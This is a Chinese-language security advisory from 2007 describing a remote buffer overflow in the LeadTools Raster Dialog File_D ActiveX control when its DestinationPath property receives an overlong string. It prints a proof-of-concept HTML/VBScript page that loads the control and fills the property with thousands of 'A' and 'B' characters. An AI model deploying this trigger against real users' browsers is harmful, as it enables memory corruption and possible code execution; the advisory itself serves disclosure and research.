LeadTools Raster Dialog File_D对象ActiveX控件远程溢出漏洞
发布日期:2007-05-24
更新日期:2007-05-28
受影响系统:LeadTools Raster Dialog File_D Object 14.5.0.44
描述:
BUGTRAQ ID:
24153
LEAD Raster对话File_D对象ActiveX控件(LTRDFD14e.DLL)是LEADTOOLS图形组件中的一个工具。
LTRDFD14e.DLL ActiveX控件在处理DestinationPath属性时存在缓冲区溢出,如果用户受骗访问了恶意站点并向该属性传送了超长字符串的话,就可能触发内存破坏,导致执行任意代码。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/25396/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/25</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------------
<b>LeadTools Raster Dialog File_D Object (LTRDFD14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit</b>
url:
http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site:
http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
---------------------------------------------------------------------------------------------------
<object classid='clsid:00140BB5-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
buff = String(4408, "A")
get_EDX = "aaaa"
buff1 = String(8992, "B")
test.DestinationPath = buff + get_EDX + buff1
End Sub
</script>
</span></span>
</code></pre>
建议:
厂商补丁:
LeadTools
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.leadtools.com/SDK/Raster/Raster-Addon-JPEG2000.htm浏览次数:2853
严重程度:0(网友投票)